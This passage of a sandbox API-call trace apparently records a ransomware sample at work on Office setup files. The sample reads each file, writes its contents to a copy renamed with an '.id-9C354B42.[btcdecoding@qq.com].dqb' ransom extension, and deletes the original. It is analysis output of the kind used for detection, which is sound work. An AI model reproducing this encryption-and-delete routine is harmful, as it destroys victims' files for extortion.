controller\\office.en-us\\pss10o.chm")) returned 1 [0038.858] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0038.858] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0038.858] lstrlenW (lpString=".doc") returned 4 [0038.858] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0038.858] lstrlenW (lpString=".docx") returned 5 [0038.858] lstrcmpiW (lpString1=".docx", lpString2="O.CHM") returned -1 [0038.858] lstrlenW (lpString=".pdf") returned 4 [0038.858] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0038.858] lstrlenW (lpString=".xls") returned 4 [0038.859] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0038.859] lstrlenW (lpString=".xlsx") returned 5 [0038.859] lstrcmpiW (lpString1=".xlsx", lpString2="O.CHM") returned -1 [0038.859] lstrlenW (lpString=".ppt") returned 4 [0038.859] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0038.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0038.859] lstrlenW (lpString=".zip") returned 4 [0038.859] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0038.859] lstrlenW (lpString=".rar") returned 4 [0038.859] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0038.859] lstrlenW (lpString=".bz2") returned 4 [0038.859] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0038.859] lstrlenW (lpString=".7z") returned 3 [0038.859] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0038.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0038.859] lstrlenW (lpString=".dbf") returned 4 [0038.859] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0038.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0038.859] lstrlenW (lpString=".1cd") returned 4 [0038.859] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0038.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0038.859] lstrlenW (lpString=".jpg") returned 4 [0038.859] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0038.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0038.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0038.859] lstrlenW (lpString=".doc") returned 4 [0038.859] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0038.859] lstrlenW (lpString=".docx") returned 5 [0038.859] lstrcmpiW (lpString1=".docx", lpString2="O.CHM") returned -1 [0038.859] lstrlenW (lpString=".pdf") returned 4 [0038.859] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0038.859] lstrlenW (lpString=".xls") returned 4 [0038.859] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0038.859] lstrlenW (lpString=".xlsx") returned 5 [0038.860] lstrcmpiW (lpString1=".xlsx", lpString2="O.CHM") returned -1 [0038.860] lstrlenW (lpString=".ppt") returned 4 [0038.860] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0038.860] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0038.860] lstrlenW (lpString=".zip") returned 4 [0038.860] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0038.860] lstrlenW (lpString=".rar") returned 4 [0038.860] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0038.860] lstrlenW (lpString=".bz2") returned 4 [0038.860] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0038.860] lstrlenW (lpString=".7z") returned 3 [0038.860] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0038.860] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0038.860] lstrlenW (lpString=".dbf") returned 4 [0038.860] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0038.860] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0038.860] lstrlenW (lpString=".1cd") returned 4 [0038.860] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0038.860] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0038.860] lstrlenW (lpString=".jpg") returned 4 [0038.860] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0038.860] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0038.860] lstrlenW (lpString="OneNoteMUI.XML") returned 14 [0038.860] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e0 [0038.861] GetFileSizeEx (in: hFile=0x1e0, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=1606) returned 1 [0038.861] CloseHandle (hObject=0x1e0) returned 1 [0038.861] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml")) returned 0x20 [0038.861] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0038.861] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e0 [0038.861] SetFilePointerEx (in: hFile=0x1e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.861] SetFilePointerEx (in: hFile=0x1e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.861] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0038.953] GetLastError () returned 0x0 [0038.953] ReadFile (in: hFile=0x1e0, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x646, lpOverlapped=0x0) returned 1 [0038.954] WriteFile (in: hFile=0x1ac, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x650, lpOverlapped=0x0) returned 1 [0038.955] ReadFile (in: hFile=0x1e0, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0038.955] WriteFile (in: hFile=0x1ac, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0038.955] SetEndOfFile (hFile=0x1ac) returned 1 [0038.956] CloseHandle (hObject=0x1ac) returned 1 [0039.329] SetFilePointerEx (in: hFile=0x1e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.329] SetEndOfFile (hFile=0x1e0) returned 1 [0039.330] CloseHandle (hObject=0x1e0) returned 1 [0039.330] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0039.330] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml")) returned 1 [0039.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0039.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0039.330] lstrlenW (lpString=".doc") returned 4 [0039.330] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.330] lstrlenW (lpString=".docx") returned 5 [0039.330] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0039.330] lstrlenW (lpString=".pdf") returned 4 [0039.330] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.330] lstrlenW (lpString=".xls") returned 4 [0039.331] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.331] lstrlenW (lpString=".xlsx") returned 5 [0039.331] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0039.331] lstrlenW (lpString=".ppt") returned 4 [0039.331] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0039.331] lstrlenW (lpString=".zip") returned 4 [0039.331] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.331] lstrlenW (lpString=".rar") returned 4 [0039.331] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.331] lstrlenW (lpString=".bz2") returned 4 [0039.331] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.331] lstrlenW (lpString=".7z") returned 3 [0039.331] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0039.331] lstrlenW (lpString=".dbf") returned 4 [0039.331] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0039.331] lstrlenW (lpString=".1cd") returned 4 [0039.331] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0039.331] lstrlenW (lpString=".jpg") returned 4 [0039.331] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0039.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0039.331] lstrlenW (lpString=".doc") returned 4 [0039.331] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.331] lstrlenW (lpString=".docx") returned 5 [0039.331] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0039.331] lstrlenW (lpString=".pdf") returned 4 [0039.331] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.331] lstrlenW (lpString=".xls") returned 4 [0039.331] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.331] lstrlenW (lpString=".xlsx") returned 5 [0039.331] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0039.331] lstrlenW (lpString=".ppt") returned 4 [0039.332] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0039.332] lstrlenW (lpString=".zip") returned 4 [0039.332] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.332] lstrlenW (lpString=".rar") returned 4 [0039.332] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.332] lstrlenW (lpString=".bz2") returned 4 [0039.332] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.332] lstrlenW (lpString=".7z") returned 3 [0039.332] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0039.332] lstrlenW (lpString=".dbf") returned 4 [0039.332] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0039.332] lstrlenW (lpString=".1cd") returned 4 [0039.332] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0039.332] lstrlenW (lpString=".jpg") returned 4 [0039.332] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.332] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0039.332] lstrlenW (lpString="SETUP.XML") returned 9 [0039.332] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0039.810] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=16683) returned 1 [0039.810] CloseHandle (hObject=0x174) returned 1 [0039.810] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml")) returned 0x20 [0039.810] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0039.810] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0039.811] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.811] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.811] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0040.151] GetLastError () returned 0x0 [0040.152] ReadFile (in: hFile=0x174, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x412b, lpOverlapped=0x0) returned 1 [0040.308] WriteFile (in: hFile=0x19c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x4130, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x4130, lpOverlapped=0x0) returned 1 [0040.309] ReadFile (in: hFile=0x174, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.309] WriteFile (in: hFile=0x19c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.309] SetEndOfFile (hFile=0x19c) returned 1 [0040.309] CloseHandle (hObject=0x19c) returned 1 [0040.310] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.310] SetEndOfFile (hFile=0x174) returned 1 [0040.311] CloseHandle (hObject=0x174) returned 1 [0040.311] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0040.311] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml")) returned 1 [0040.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.312] lstrlenW (lpString=".doc") returned 4 [0040.312] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.312] lstrlenW (lpString=".docx") returned 5 [0040.312] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.312] lstrlenW (lpString=".pdf") returned 4 [0040.312] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.312] lstrlenW (lpString=".xls") returned 4 [0040.312] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.312] lstrlenW (lpString=".xlsx") returned 5 [0040.312] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.312] lstrlenW (lpString=".ppt") returned 4 [0040.312] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.312] lstrlenW (lpString=".zip") returned 4 [0040.312] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.312] lstrlenW (lpString=".rar") returned 4 [0040.312] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.312] lstrlenW (lpString=".bz2") returned 4 [0040.312] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.312] lstrlenW (lpString=".7z") returned 3 [0040.312] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.312] lstrlenW (lpString=".dbf") returned 4 [0040.312] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.312] lstrlenW (lpString=".1cd") returned 4 [0040.312] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.312] lstrlenW (lpString=".jpg") returned 4 [0040.312] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.313] lstrlenW (lpString=".doc") returned 4 [0040.313] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.313] lstrlenW (lpString=".docx") returned 5 [0040.313] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.313] lstrlenW (lpString=".pdf") returned 4 [0040.313] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.313] lstrlenW (lpString=".xls") returned 4 [0040.313] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.313] lstrlenW (lpString=".xlsx") returned 5 [0040.313] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.313] lstrlenW (lpString=".ppt") returned 4 [0040.313] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.313] lstrlenW (lpString=".zip") returned 4 [0040.313] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.313] lstrlenW (lpString=".rar") returned 4 [0040.313] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.313] lstrlenW (lpString=".bz2") returned 4 [0040.313] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.313] lstrlenW (lpString=".7z") returned 3 [0040.313] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.313] lstrlenW (lpString=".dbf") returned 4 [0040.313] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.313] lstrlenW (lpString=".1cd") returned 4 [0040.313] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.313] lstrlenW (lpString=".jpg") returned 4 [0040.313] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.313] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0040.314] lstrlenW (lpString="SETUP.XML") returned 9 [0040.314] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0040.412] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=6241) returned 1 [0040.412] CloseHandle (hObject=0x204) returned 1 [0040.412] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml")) returned 0x20 [0040.412] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0040.412] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0040.412] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.412] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.413] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0040.413] GetLastError () returned 0x0 [0040.413] ReadFile (in: hFile=0x204, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x1861, lpOverlapped=0x0) returned 1 [0040.420] WriteFile (in: hFile=0x208, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x1870, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x1870, 